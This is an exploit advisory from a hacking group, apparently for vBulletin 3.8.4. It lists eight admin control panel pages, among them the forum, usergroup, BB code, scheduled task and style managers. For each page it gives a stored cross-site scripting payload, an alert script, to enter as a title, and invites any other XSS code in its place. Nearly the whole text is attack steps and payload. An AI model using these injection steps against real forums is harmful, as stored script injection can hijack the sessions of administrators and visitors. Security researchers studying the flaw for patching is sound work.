############################################################################

                .::vBulletin adminCP Cross-Site Scripting ::.

# Exploit Title: vBulletin adminCP Cross-Site Scripting
# Date: 2009
# Author: Ashiyane Digital Security Members (Cair3x)
# Software Link: http://www.vbulletin.com/
# Version: 3.8.4 and all Version
# Tested on: vBulletin 3.8.4
# CVE :
# Code :


                 -::Forum Manager => Add New Forum ::-

Exploit : 

Go To ( http://127.0.0.1/vb/admincp/forum.php?do=add )

Add a new title . use the following code as title name : 

.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .


               -::Calendar Manager => Add New Calendar ::-

Exploit : 

Go To ( http://127.0.0.1/vb/admincp/admincalendar.php?do=add )

Add a new title . use the following code as title name : 

.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .


               -::Usergroup Manager => Add New Usergroup ::-

Exploit : 

Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )

Add a new title . use the following code as title name : 

.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .


                   -::User Rank Manager => Rank Type ::-

Exploit : 

Go To ( http://127.0.0.1/vb/admincp/ranks.php?do=add )

use the following code as (OR you may enter text HTML is allowed) Text . 

.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .


               -::BB Code Manager => Add New BB Code ::-

Exploit : 

Go To ( http://127.0.0.1/vb/admincp/bbcode.php?do=add )

Complete All Required Fields And Enter Javascript Code in Title : 

.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .


          -::Scheduled Task Manager => Add New Scheduled Task ::-

Exploit : 

Go To ( http://127.0.0.1/vb/admincp/cronadmin.php?do=edit )

Complete All Required Fields And Enter Javascript Code in Title : 

.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .



               -::FAQ Manager => Add New FAQ Item  ::-

Exploit : 

Go To ( http://127.0.0.1/vb/admincp/faq.php?do=add )

Add a new title . use the following code as title name : 

.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .



               -::Style Manager => Add New Style ::-

Exploit : 

Go To ( http://127.0.0.1/vb/admincp/template.php?do=addstyle )

Add a new title . use the following code as title name : 

.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .

All of the best

* Cair3x From Ashiyane Digital Security Members : (WwW.Ashiyane.org/forums/)